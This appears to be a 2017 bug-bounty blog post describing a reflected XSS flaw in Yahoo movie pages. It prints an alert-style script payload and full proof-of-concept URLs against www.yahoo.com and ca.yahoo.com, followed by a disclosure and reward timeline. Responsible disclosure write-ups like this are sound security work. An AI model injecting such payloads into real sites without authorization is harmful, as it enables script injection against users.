Reflected XSS in Yahoo!

Shahzada Al Shahriar Khan Thursday, August 31, 2017 Bug Bounty Cross-Site Scripting Ethical Hacking Hackerone Reflected XSS in Yahoo XSS In Yahoo

Hello Guys, This is Shahzada Al Shahriar Khan. Known as TheShahzada.

I am from Bangladesh. And I am Newbie in Bug Bounty. :P

Well, Now I will share how I found Reflected Cross-Site Scripting (XSS) in main & sub domain of Yahoo.

Vulnerable URL:
 1. https://www.yahoo.com/movies/film/[*]
 2. https://ca.yahoo.com/movies/film/[*]

Payload I Use:
 “><%2fscript><script>alert(document.domain)<%2fscript>

PoC URL:
 1. https://www.yahoo.com/movies/film/"><%2fscript><script>alert(document.domain)<%2fscript>
 2. https://ca.yahoo.com/movies/film/"><%2fscript><script>alert(document.domain)<%2fscript>

PoC:

Yahoo Canada Subdomain

Video PoC:

https://youtu.be/QHRbzyIlpkc

Timeline: Aug 12th — I Submitted The Report. Aug 15th — Triaged The Report & Rewarded Me $300 Initial Bounty. Aug 16th — Resolved Aug 24th — $400 Bounty Rewarded.

./The_S


Originally published at blog.theshahzada.com on August 31, 2017.